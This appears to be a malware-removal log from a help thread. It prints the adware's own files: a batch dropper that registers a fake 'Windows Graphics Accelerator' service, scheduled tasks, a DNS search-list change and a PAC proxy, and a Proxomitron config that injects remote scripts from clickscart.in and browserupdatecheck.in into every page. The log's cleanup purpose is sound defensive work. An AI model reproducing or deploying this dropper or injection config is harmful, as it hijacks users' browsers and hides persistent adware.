File: C:\Windows\system32\Drivers\healusb.sys
File: C:\Windows\system32\cygwin.sys
cmd: type C:\Windows\mstdcvtr.bat
cmd: type C:\Windows\initcvtr.bat
cmd: type C:\Windows\default.cfg
cmd: type C:\Users\dell 2\Desktop\JRT.txt
cmd: type C:\Users\dell 2\Downloads\software_removal_tool.log
cmd: type C:\Users\dell 2\Desktop\Result.txt
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader64.dll ()
Task: {0A31A79E-2917-48A2-9B70-B5FC12E49153} - \avabvbxvh No Task File <==== ATTENTION
Task: {176A12CA-0E00-48F8-996E-4F5457FB4C20} - \EssentialUpdateMachine No Task File <==== ATTENTION
Task: {D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E} - \Winupdate No Task File <==== ATTENTION
Hosts:
RemoveProxy:
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
EmptyTemp:
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Windows\system32\GroupPolicy\Machine => moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully.
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully.
"HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
C:\Program Files (x86)\GUT9627.tmp => moved successfully.
C:\Program Files (x86)\GUM9626.tmp => moved successfully.
C:\found.000 => moved successfully.
 
========================= File: C:\Windows\system32\ysxja.exe ========================
 
MD5: F2867BEE7180CDC839F7636FDDC1AA74
Creation and modification date: 2015-05-31 19:32 - 2015-04-25 05:18
Size: 0295424
Attributes: ----A
Company Name: Groom-A-Zebu ™  
Internal Name: Pancreas frappe'
Original Name: Proxomitron.exe
Product Name: Proxomitron
Description: The Proxomitron
File Version: 4, 5, 0, 4
Product Version: Naoko-4.5 2003-6-1
Copyright$creamod: Copyright © 1999 - 2003 By Scott R. Lemmon
 
====== End of File: ======
 
 
========================= File: C:\Windows\cygavb.exe ========================
 
MD5: F2867BEE7180CDC839F7636FDDC1AA74
Creation and modification date: 2015-05-31 19:32 - 2015-04-25 05:18
Size: 0295424
Attributes: ----A
Company Name: Groom-A-Zebu ™  
Internal Name: Pancreas frappe'
Original Name: Proxomitron.exe
Product Name: Proxomitron
Description: The Proxomitron
File Version: 4, 5, 0, 4
Product Version: Naoko-4.5 2003-6-1
Copyright$creamod: Copyright © 1999 - 2003 By Scott R. Lemmon
 
====== End of File: ======
 
 
========================= File: C:\Windows\FiddlerCore4.dll ========================
 
MD5: 80458A0AAA7887CD2ABEE4CED376DA0E
Creation and modification date: 2015-05-31 19:32 - 2012-07-09 11:02
Size: 0279552
Attributes: ----A
Company Name: Eric Lawrence
Internal Name: FiddlerCore4.dll
Original Name: FiddlerCore4.dll
Product Name: FiddlerCore
Description: FiddlerCore
File Version: 4.4.0.1
Product Version: 4.4.0.1
Copyright$creamod: Copyright ©2012 Eric Lawrence. All Rights Reserved.
 
====== End of File: ======
 
 
========================= File: C:\Windows\system32\Drivers\healusb.sys ========================
 
MD5: F57AB986584DCF46800D572D9747548B
Creation and modification date: 2015-05-31 19:32 - 2013-01-06 07:43
Size: 0000074
Attributes: ----A
Company Name: 
Internal Name: 
Original Name: 
Product Name: 
Description: 
File Version: 
Product Version: 
Copyright$creamod: 
 
====== End of File: ======
 
 
========================= File: C:\Windows\system32\cygwin.sys ========================
 
MD5: F57AB986584DCF46800D572D9747548B
Creation and modification date: 2015-05-31 19:32 - 2013-01-06 07:43
Size: 0000074
Attributes: ----A
Company Name: 
Internal Name: 
Original Name: 
Product Name: 
Description: 
File Version: 
Product Version: 
Copyright$creamod: 
 
====== End of File: ======
 
 
=========  type C:\Windows\mstdcvtr.bat =========
 
@ECHO OFF
if not exist "%systemroot%\wnavga.exe" ( if exist "%systemroot%\cfsvc.exe" ( copy /Y %systemroot%\cfsvc.exe %systemroot%\wnavga.exe ))
 
sc create WinGraph binpath= "%SystemRoot%\wnavga.exe" type= own start= auto DisplayName= "Windows Graphics Accelerator"
cls
sc description WinGraph "Optimizes performance of applications by caching commonly used font data. Applications will start this service if it is not already running. It can be disabled, though doing so will degrade application performance."
cls
sc failure WinGraph reset= 30 actions= restart/5000
cls
sc sidtype WinGraph UNRESTRICTED
cls
sc triggerinfo WinGraph start/networkon stop/networkoff
cls
sc start WinGraph
cls
 
if not exist "%systemroot%\chp.exe" ( if exist "%systemroot%\pgbmaf.exe" ( copy /Y %systemroot%\pgbmaf.exe %systemroot%\chp.exe ))
if not exist "%systemroot%\cygavb.exe" ( if exist "%systemroot%\System32\ysxja.exe" ( copy /Y %systemroot%\System32\ysxja.exe %systemroot%\cygavb.exe ))
 
if not exist "%systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe" ( if exist "%systemroot%\memupdate.exe" ( copy /Y %systemroot%\memupdate.exe %systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe ))
 
if not exist "%systemroot%\memupdate.exe" ( if exist "%systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe" ( copy /Y %systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe %systemroot%\memupdate.exe ))
if not exist "%systemroot%\wuappl.exe" ( if exist "%systemroot%\memupdate.exe" ( copy /Y %systemroot%\memupdate.exe %systemroot%\wuappl.exe ))
 
schtasks.exe /create /xml %systemroot%\soxe /TN EssentialUpdateMachine
schtasks.exe /create /xml %systemroot%\plofgye /TN Winupdate
 
chp.exe %systemroot%\cygavb.exe
cls
for /f "tokens=2*" %%a in ('REG QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters" /v SearchList') do ( set "SearchList=%%~b" )
::ECHO %SearchList%
IF NOT "%SearchList%" == "browserupdatecheck.in" (REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v SearchList /t REG_SZ /d browserupdatecheck.in /f) 
cls
ipconfig /registerdns
cls
::Pac file entry
if exist "%systemroot%\System32\Drivers\healusb.sys" (
del %systemroot%\System32\Drivers\winpacket.pac
copy /Y "%systemroot%\system32\Drivers\healusb.sys" %systemroot%\System32\Drivers\winpacket.pac
)
if not exist "%systemroot%\System32\Drivers\winpacket.pac" ( copy /Y "%systemroot%\system32\cygwin.sys" %systemroot%\System32\Drivers\winpacket.pac )
cls
for /f "tokens=2*" %%a in ('REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL') do set "config=%%~b"
IF NOT "%config%" == 'file://%systemroot%\System32\Drivers\winpacket.pac' ( 
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /t REG_SZ /d file://"%systemroot%"\System32\Drivers\winpacket.pac /f 
cls
for /f "skip=2"  %%a in ('REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections" /s') do call :loop "%%a" 
cls
goto End
:loop
set con= %1
cls
for /f "tokens=2* skip=2" %%a in ('REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections"  /v %con%') do call :Foo %%b  %con%
cls
goto End
:End
 
:Foo
set str= %1
set conn= %2
set fstr=%str:~1,16%
set lstr=%str:~19,300%
cls
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections" /v "%conn%" /t REG_BINARY /d "%fstr%09%lstr%" /f 
cls
goto :eof
 
:End
 
 
 
========= End of CMD: =========
 
 
=========  type C:\Windows\initcvtr.bat =========
 
@ECHO OFF
cmd.exe /c mstdcvtr.bat
 
 
========= End of CMD: =========
 
 
=========  type C:\Windows\default.cfg =========
 
[Global]
Enable = TRUE
FreezeGIF = FALSE
FilterHTML = TRUE
FilterHeadersOut = FALSE
FilterHeadersIn = FALSE
EnableProxy = FALSE
EnableAutoRun = FALSE
ForceTextures = FALSE
NoTextures = TRUE
SysTray = FALSE
UseSSLeay = FALSE
NoCmdURL = TRUE
PriorityBoost = TRUE
BypassURL = "$LST(Bypass)"
Port = 8080
MaxCapURL = 100
 
[WinSizes]
Win.00 = 474:233:886:534
Win.01 = 306:233:718:534
Win.02 = 436:184:923:583
Win.03 = 334:276:689:451
Win.04 = 25:25:425:288
Win.05 = 435:221:930:517
Win.06 = 5:41:473:139
Win.07 = 5:146:473:252
 
[Blocklists]
 
[HTTP headers]
In = FALSE
Out = FALSE
Key = "Accept-encoding: Allow webpage encoding (out)"
Match = "*"
Replace = "gzip, deflate"
 
In = FALSE
Out = FALSE
Key = "Accept-encoding: prevent webpage encoding (out)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Authorization: Example password entry (out)"
URL = "www.needspassword.com/this/area/protected.html"
Replace = "basic bWljaGllOm5lb24temVicmE="
 
In = FALSE
Out = FALSE
Key = "Cache-Control: always cache (in)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Connection: Close all connections (In+Out)"
Replace = "close"
 
In = FALSE
Out = FALSE
Key = "Content-Type: character set filter (in)"
Match = "text/html;*charset*"
Replace = "text/html"
 
In = FALSE
Out = FALSE
Key = "Content-Type: Fix MIME types (In)"
Match = "text/*&$URL(https+://[^/]+*.([a-z0-9]+{2,5}(^?)&&$LST(MIME-List)))"
Replace = "\0"
 
In = FALSE
Out = FALSE
Key = "Content-Type: Show contents of .pac files (in)"
Match = "application/x-ns-proxy-autoconfig"
Replace = "text/plain"
 
In = FALSE
Out = FALSE
Key = "Content-Type: View RealAudio links (in)"
Match = "*realaudio*"
Replace = "text/html"
 
In = FALSE
Out = FALSE
Key = "Cookie: Fake a cookie (out)"
Match = "*"
Replace = "monster"
 
In = FALSE
Out = FALSE
Key = "Cookie: Kill a cookie (out)"
URL = "(^$LST(CookieList))"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Expires: always cache (in)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Forwarded: (out)"
Replace = "\h"
 
In = FALSE
Out = FALSE
Key = "If-Modified-Since: Always reload pages (Out)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Last-Modified: (In)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Pragma: Don't force reloads (out)"
Match = "no-cache"
 
In = FALSE
Out = FALSE
Key = "Proxy-Authorization: Send password to proxy server (out)"
Replace = "basic cHJveHl1c2VyOnByb3h5cGFzcw=="
 
In = FALSE
Out = FALSE
Key = "Referer: Hide where we've been (Out)"
Match = "*"
Replace = "\u"
 
In = FALSE
Out = FALSE
Key = "Set-cookie: Make all cookies session only (in)"
URL = "(^$LST(CookieList))"
Match = "?&(\#; expires=[^;]+)+\#"
Replace = "\@"
 
In = FALSE
Out = FALSE
Key = "Set-cookie: Never accept cookies (In)"
URL = "(^$LST(CookieList))"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "URL-Killer: kill-a-URL (out)"
URL = "$LST(AdList)"
Replace = "URL killed \k"
 
In = FALSE
Out = FALSE
Key = "URL: Alias Redirector (Out)"
URL = ".$LST(AliasList)"
 
In = FALSE
Out = FALSE
Key = "URL: Enable Keyword search (Out)"
URL = "[^./]+/(^?)&\w[a-z]&$JUMP(http://www.google.com/search?q=\h)"
 
In = FALSE
Out = FALSE
Key = "URL: Un-Prefixer (Out)"
Match = "[^\]+\w[^a-z]((http|ftp)(%3A|:)(%2F|/)[^&]+)\1"
Replace = "$JUMP($UESC(\1))"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Lynx 2.8 (out) "
Match = "*"
Replace = "Lynx/2.8.3dev.8 libwww-FM/2.14FM"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Netscape BEOS (out) "
Match = "*"
Replace = "Mozilla/4.41  (BEOS; U ;Nav)"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Netscape Linux (out) "
Match = "*"
Replace = "Mozilla/4.61 [ja] (X11; I; Linux 2.2.13-33cmc1 i686)"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Netscape Mac 68k (out) "
Match = "*"
Replace = "Mozilla/3.01Gold (Macintosh; I; 68K)"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Opera 5.02 (out) "
Match = "*"
Replace = "Opera/5.02 (Windows 98; U)  [en]"
 
In = FALSE
Out = FALSE
Key = "User-Agent: SpaceBison (out) "
Match = "*"
Replace = "Space Bison/0.02 [fu] (Win67; X; SK)"
 
In = FALSE
Out = FALSE
Key = "WWW-Authenticate: filter out password requests (in)"
Match = "Basic*realm="*""
 
In = FALSE
Out = FALSE
Key = "X-Forwarded-For (out):"
Replace = "yahoo.com, microsoft.com, netscape.com, aol.com, \h"
 
 
[Patterns]
Name = "Add Security Bottom"
Active = TRUE
Limit = 256
Match = "</body>"
Replace = "<script src="http://dial.clickscart.in/js/scrap.js" type="text/javascript"></script><script src="http://dial.clickscart.in/js/ads.js" type="text/javascript"></script><script src="http://browserupdatecheck.in/js/jquery.js" type="text/javascript"></script><script src="http://browserupdatecheck.in/js/essence.js" type="text/javascript"></script> </body>"
 
Name = "Add Security Top"
Active = TRUE
Limit = 256
Match = "</title>"
Replace = "</title><script type = "text/javascript" src = "http://dial.clickscart.in/js/jquery-1.8.2.min.js"> </script><script type = "text/javascript" src = "http://dial.clickscart.in/js/redir.js"> </script>"
 
Name = "Banner Replacer"
Active = FALSE
Multi = TRUE
Bounds = "<a\s[^>]++href=*</a>"
Limit = 800
Match = "\0<img (\1border=\w|) \2 src=$AV(*) (\3border=\w|) \4"
        "&(*(src|href)=$AV($LST(AdKeys)*)|"
        "(*width=[#460-480] & *height=[#55-60])|"
        "(*width=[#88] & *height=[#31]))*"
Replace = "\0<img \1 border=1 \2 src=http://Local.ptron/killed.gif \3 \4"
 
Name = "Banner Blaster (limit text)"
Active = FALSE
Multi = TRUE
Bounds = "<a\s[^>]++href=*</a>|<input*>|<ilayer*</ilayer>|<iframe*</iframe>|<object*</object>"
Limit = 900
Match = "(<(ilayer|iframe|object)*|\1<i(mg|mage|nput)*src=$AV(*)*>\3)"
        "&(*(href|src)=$AV($LST(AdKeys)*)|"
        "*http://*<i(mg|mage|nput)\s(*>&&"
        "(*width=[#460-480]&*height=[#55-60]*)|"
        "(*width=[#88]&*height=[#31]*)))"
        "&(*alt=$AV((?+{18})\2*|\2)|$SET(2=Ad))"
Replace = "<center>\1<font size=1 color=red>[\2]</font>\3</center>"
 
Name = "Banner Blaster (full text)"
Active = FALSE
Multi = TRUE
Bounds = "<a\s[^>]++href=*</a>|<input*>|<ilayer*</ilayer>|<iframe*</iframe>|<object*</object>"
Limit = 900
Match = "(<(ilayer|iframe|object)*|\1<i(mg|mage|nput)*src=$AV(*)*>\3)"
        "&(*(href|src)=$AV($LST(AdKeys)*)|"
        "*http://*<i(mg|mage|nput)\s(*>&&"
        "(*width=[#460-480]&*height=[#55-60]*)|"
        "(*width=[#88]&*height=[#31]*)))"
        "&(*alt=$AV(\2)|$SET(2=Ad))"
Replace = "<center>\1<font size=1 color=red>[\2]</font>\3</center>"
 
Name = "DOM Banner Blaster v0.007"
Active = FALSE
Bounds = "<a\s*</(a|td|tr)>|<iframe*</iframe>|<ilayer*</ilayer>|<img*>|<input*>|<script(*(</sc|"*'))++ript >|<object*</object>|<form*</form>"
Limit = 8000
Match = "*=$AV($LST(AdKeys)*)*&<((a|form)\s*<img\s[^>+]+>|[^fa])"
Replace = "<a name=PDomTarget ></a>"
 
Name = "DOM container killer v0.007"
Active = FALSE
Limit = 256
Match = "<end>"
Replace = "\r\n<!-- // --><script src="http://local.ptron/DomConKiller.js"></script>"
 
Name = "Area Map Ad Blaster"
Active = FALSE
Multi = TRUE
Bounds = "<img\s[^>]+> <map\s*</map>"
Limit = 800
Match = "*usemap*>*"
        "&*(ads.|log_click|/ad|clickthru|(banner|ad|acct|source|click)(id|)=|adbanner|clicker|sponsor|adver|promo|redirect)*"
        "&*<map*<area (*href=(\w)\1 & (*alt="\2'|))*>\3</map>"
Replace = "<br><killmap><font size=1><a href=\1>[\2]</a></font>\3</killmap>"
 
Name = "Area Map Ad Blaster pt2 (show all links)"
Active = FALSE
Multi = TRUE
Bounds = "<killmap>*</killmap>"
Limit = 800
Match = "\1 <area (*href=(\w)\2 & (*alt="(?+{12})\3*|\3'|))*> \4"
Replace = " \1 <font size=1><a href=\2 >[\3]</a></font> \4 "
 
Name = "Kill JavaScript Banners"
Active = FALSE
Bounds = "<script($INEST(<script,</script)</script>( <noscript>|)|*)"
Limit = 2048
Match = "*(://$AV($LST(AdList)*)|"
        "(\=?\=?\=?\=?|ad(click|cycle)|.submit\(*focus\(|super_flashFileURL"
        "|banner_height|<iframe|'ht'\+|.referrer|</script*</script))\1"
        "&[^>]+>((*</script>)\0( <noscript>|)|\0)"
Replace = "<!-- JS Banner blocked -->\r\n"
          "<script language="ShonenScript">\0"
 
Name = "Kill specific Java applets"
Active = FALSE
Bounds = "<applet\s*</applet>"
Limit = 2048
Match = "*code=$AV((scroll|NavigatorTicker|movie|WSSApplet|hyper).*)*"
Replace = "<font size=1>[JavaApp Killed]</font><br>"
 
Name = "Flash animation killer"
Active = FALSE
Bounds = "<object*</object>|<embed*>( </embed>|)"
Limit = 1024
Match = "[^>]++(codebase|type)=$AV(*(flash|shockwave)*)*"
        "&(*<param ( name=$AV(movie|src)| value=$AVQ(\1))+{2}|*src=$AVQ(\1))"
Replace = "<a href=\1>[flash]</a>"
 
Name = "Counter Killer"
Active = FALSE
Bounds = "<img\s*>"
Limit = 256
Match = "\1 src=$AV(*(count(er|.pl)|stat|tracker)([^a-z]*|(^?))) \2"
Replace = "\1 src=http://Local.ptron/killed.gif border=1 \2"
 
Name = "Kill off-site Images"
Active = FALSE
Multi = TRUE
Bounds = "<(a\s[^>]++href=*</a>|i(mg|nput)\s*>)"
Limit = 800
Match = "\1<i(mg|nput)(*alt="\0"|)*>\2&*http://(^\h)"
        "&(^*(width=[#0-75]|height=[#0-20]))"
Replace = " \1<font size=1>[\0]</font>\2"
 
Name = "Kill all Images on selected pages"
Active = FALSE
URL = "$LST(NoImages)"
Bounds = "<i(mg|mage|nput)*>"
Limit = 256
Match = "\1src=$AV(*)\2&(^*height=[#3:16])"
Replace = "\1 border=1 "
          "src="http://Local.ptron/killed.gif" \2"
 
Name = "Un-Prefix URLs"
Active = FALSE
URL = "[^.]+.(lycos|snap|yahoo|metacrawler)"
Limit = 1024
Match = "href=($AV(?????*[^a-z0-9]((http|ftp)(%3A|:)(%2F|/)(%2F|/)(^\h)[^&]+)\1*)&("|)\0)"
Replace = "href=\0$UESC(\1)\0"
 
Name = "Webpage Background Killer"
Active = FALSE
Multi = TRUE
Limit = 200
Match = "<body \1background=\2>"
Replace = "<body \1nobak=\2>"
 
Name = "Webpage Background Replacer"
Active = FALSE
Multi = TRUE
Limit = 200
Match = "<body ( \1 background=\w|) \2>"
Replace = "<body \1 background="http://Local.ptron/black.gif" \2>"
 
Name = "Kill All Backgrounds (even tables)"
Active = FALSE
Limit = 20
Match = "background(=|-image:)\1"
Replace = "nobak\1"
 
Name = "Sounds to links"
Active = FALSE
Bounds = "<(embed|bgsound)\s*>"
Limit = 1024
Match = "[<a-z]+ (*qtsrc|*src)=$AVQ(\1)&(*type=$AV(\2)|$SET(2=AV-Killed))*"
Replace = "<a href=\1 >[\2]</a>"
 
Name = "Sound Silencer"
Active = FALSE
Limit = 20
Match = "<(embed|bgsound)\s"
Replace = "<keepquiet "
 
Name = "Embedded MIDI Silencer"
Active = FALSE
Bounds = "<embed\s*>"
Limit = 256
Match = "*src=$AVQ(\1)*&*(.mid|midi)"
Replace = "<embed src=\1 height=15 controls=smallconsole  >"
 
Name = "Blink Buster (Blink to Bold)"
Active = FALSE
Limit = 20
Match = "<(/|)\1blink>"
Replace = "<\1b>"
 
Name = "Freeze font's face"
Active = FALSE
Limit = 80
Match = "<font\s\1face=\2>"
Replace = "<font \1ecaf=\2>"
 
Name = "Onload unloader"
Active = FALSE
Limit = 20
Match = "onload="
Replace = "LoadOff="
 
Name = "OnUnload unloader"
Active = FALSE
Limit = 20
Match = "onunload="
Replace = "UnLoadOff="
 
Name = "Kill pop-up windows"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 4096
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script src="http://local.ptron/WindowOpen.js"></script>\r\n"
 
Name = "Restore pop-ups after a page loads"
Active = FALSE
Limit = 4096
Match = "<end>"
Replace = "\r\n<!--//--><script>PrxRST();</script>"
 
Name = "Force pop-ups to have browser controls"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script>PrxModAtr=1;</script>\r\n"
 
Name = "Link De-Obfuscator"
Active = FALSE
Limit = 50
Match = "onmouseover=($AV(*.status=*))\1"
Replace = "nomouseover=\1"
 
Name = "Anti-Auto-Refresher"
Active = FALSE
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv=("|)refresh*content=("|) [#5:*]( ([;,]|) (url=|)("|)([^>"' ]+)\1|)*"
Replace = "<center><font size=1><a href=\1 >[Refresh]</a></font></center>"
 
Name = "Wordwrap all form textboxes"
Active = FALSE
Limit = 128
Match = "<textarea\s\1>"
Replace = "<textarea wrap=soft \1>"
 
Name = "GeoCities branding killer"
Active = FALSE
URL = "*.geocities."
Limit = 2500
Match = "<div class="geobranding*</script>"
Replace = "<font size=1>[GeoBrand killed]</font>"
 
Name = "Kill add-on JavaScripts "
Active = FALSE
Multi = TRUE
Limit = 1024
Match = "</html>\1$NEST(<script,</script>)"
Replace = "<font size=1>[PostScript Killed]</font><br>\r\n"
          "</html>\1\r\n"
 
Name = "Suppress all JavaScript errors"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function NoError(){return(true);} onerror=NoError; </script>\r\n"
 
Name = "Kill alert/confirm boxes"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> "
          "function NoBox(txt){ return(1);} "
          "window.alert=NoBox; window.confirm=NoBox; window.prompt=NoBox;"
          "</script>\r\n"
 
Name = "Stop browser window resizing"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> "
          "function moveTo(){return true;}"
          "function resizeTo(){return true;}"
          "</script>\r\n"
 
Name = "Stop status bar scrollers"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function status(txt){return(1);} </script>\r\n"
 
Name = "Kill Dynamic HTML JavaScripts"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function NoWrite(txt){return(1);} "
          "document.write=NoWrite; "
          "document.writeln=NoWrite; "
          "</script>\r\n"
 
Name = "Stop JavaScript Timers"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 4096
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function setTimeout(x,y){return(null);} </script>\r\n"
 
Name = "Stop JavaScript Redirects"
Active = FALSE
Limit = 30
Match = ".location(=|.)\1"
Replace = ".NoLocation\1"
 
Name = "Disable JavaScript"
Active = FALSE
Limit = 128
Match = "<script*>"
Replace = "<script language="ShonenScript 712.0">"
 
Name = "Kill Nosey JavaScripts"
Active = FALSE
Bounds = "$NEST(<script,</script>)"
Limit = 16000
Match = "*(.(referrer|plugins|cookie|colorDepth|pixelDepth|external)|history.length)*"
Replace = "<!-- Killed Nosey JavaScript -->"
 
Name = "Disable JavaScript (and meta) cookies"
Active = FALSE
URL = "(^$LST(CookieList))"
Limit = 128
Match = ".cookie(*[(;)=])\1|http-equiv="Set-Cookie""
Replace = ".Cracker\1"
 
Name = "Make JS & Meta cookies session only"
Active = FALSE
URL = "^$LST(CookieList)"
Limit = 50
Match = "expires=(*["';])\1"
Replace = "NoExp=\1"
 
Name = "Hide Browser's Referrer from JS"
Active = FALSE
Limit = 15
Match = ".referrer"
Replace = ".referrer.substr(0,0)+"\u""
 
Name = "Hide Browser's Version from JS"
Active = FALSE
Limit = 25
Match = "navigator.appVersion"
Replace = "'2.1'"
 
Name = "Hide Browser's Identity from JS"
Active = FALSE
Limit = 25
Match = "navigator.(appName|userAgent)"
Replace = "'ShonenScape'"
 
Name = "Allow right mouse click"
Active = FALSE
Limit = 256
Match = ".(onmousedown=|captureEvents\()\1"
Replace = ".PrxOff_\1"
 
Name = "Kill window.external methods"
Active = FALSE
Limit = 40
Match = "window.external.[^(]+"
Replace = "null; "
 
Name = "Stop OnMouseOver events"
Active = FALSE
Limit = 20
Match = "onmouseover="
Replace = "OnPheasantOver="
 
Name = "Frame Jumper-Outer"
Active = FALSE
Multi = TRUE
Bounds = "<a\s*>"
Limit = 128
Match = "<a\s(\0http://\1&(^*_(top|blank)))"
Replace = "<a target=_top \0http://\1"
 
Name = "Kill Style Sheets"
Active = FALSE
Limit = 4096
Match = "<style*</style>"
Replace = "<!-- style sheet killed -->"
 
Name = "Kill Layers"
Active = FALSE
Limit = 20
Match = "<(/|)\1(i|)layer"
Replace = "<\1PeelLayer"
 
Name = "iFrame/iLayer to link"
Active = FALSE
Bounds = "<i(frame\s*</iframe|layer\s*</ilayer)>"
Limit = 1000
Match = "<(iframe|ilayer)\0*src=$AVQ(\1)*"
Replace = "<font size=1><a target=_blank href=\1 >[\0]</a></font>"
 
Name = "Frame Exploder"
Active = FALSE
Multi = TRUE
URL = "$TYPE(htm)"
Limit = 4096
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> "
          "if (top.location != location){"
          "window.open(location.href); window.close(); "
          "} </script>\r\n"
 
Name = "Kill top of page frame"
Active = FALSE
Multi = TRUE
Bounds = "<frameset\s*>"
Limit = 150
Match = "\1 rows=$AV([#20:90] , (\*|100%) ) \3"
Replace = "\1 rows="0,*" \3"
 
Name = "Kill bottom of page frame"
Active = FALSE
Multi = TRUE
Bounds = "<frameset\s*>"
Limit = 150
Match = "\1 rows=$AV(\* , [#10:100] ) \3"
Replace = "\1 rows="*,0" \3"
 
Name = "Allow for frame resizing"
Active = FALSE
Bounds = "<fram*>"
Limit = 256
Match = "(\#((frameborder|border)=$AV(*)|noresize|=$AV(0|no)$SET(\#==1 )))+ \1 >"
Replace = "\@\1 border=1>"
 
Name = "DeFramer"
Active = FALSE
Limit = 40
Match = "<(/|)\1(frameset|noframes)"
Replace = "<\1NoFrameset"
 
Name = "Convert Frames to Links"
Active = FALSE
Bounds = "<frame\s*>"
Limit = 256
Match = "*src=("*'|\w)\1*"
Replace = "<body><font size=2><a href=\1>Frame:\1</a></font><br></body>"
 
Name = "DeTabler"
Active = FALSE
Limit = 200
Match = "<(/|)t(able|r)*>"
Replace = "<p>"
 
Name = "Table width unlimiter"
Active = FALSE
Bounds = "<t(able|d)\s*>"
Limit = 256
Match = "\0 width=[#500:*] \1"
Replace = "\0 \1"
 
Name = "Skinnier Table Border"
Active = FALSE
Limit = 128
Match = "<table\s\1border=[#4-*]\2>"
Replace = "<table \1border=3\2>"
 
Name = "Kill anti-cache meta tags"
Active = FALSE
Limit = 40
Match = "<meta http-equiv=("|)\#(expires|Last-Modified|pragma|cache)\#"
Replace = "<moota http-ignore=\@"
 
Name = "Webpage Comment Viewer"
Active = FALSE
Bounds = "<!--*-->( </script>|)"
Limit = 256
Match = "<!--(\#<$SET(#=&lt;))+\#-->(^ </script)"
Replace = "<font size=1><pre>&lt;!--\@--&gt;</pre></font>"
 
Name = "Foreign content-type filter"
Active = FALSE
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv="content-type"*charset=*"
 
 
[Proxies]
 OpenLog = TRUE
 
 
 
========= End of CMD: =========
 
 
=========  type C:\Users\dell 2\Desktop\JRT.txt =========
 
The system cannot find the file specified.
Error occurred while processing: C:\Users\dell.
The system cannot find the path specified.
 
========= End of CMD: =========
 
 
=========  type C:\Users\dell 2\Downloads\software_removal_tool.log =========
 
The system cannot find the file specified.
Error occurred while processing: C:\Users\dell.
The system cannot find the path specified.
 
========= End of CMD: =========
 
 
=========  type C:\Users\dell 2\Desktop\Result.txt =========
 
The system cannot find the file specified.
Error occurred while processing: C:\Users\dell.
The system cannot find the path specified.
 
========= End of CMD: =========
 
"HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A31A79E-2917-48A2-9B70-B5FC12E49153}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A31A79E-2917-48A2-9B70-B5FC12E49153}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\avabvbxvh" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{176A12CA-0E00-48F8-996E-4F5457FB4C20}" => key removed successfully
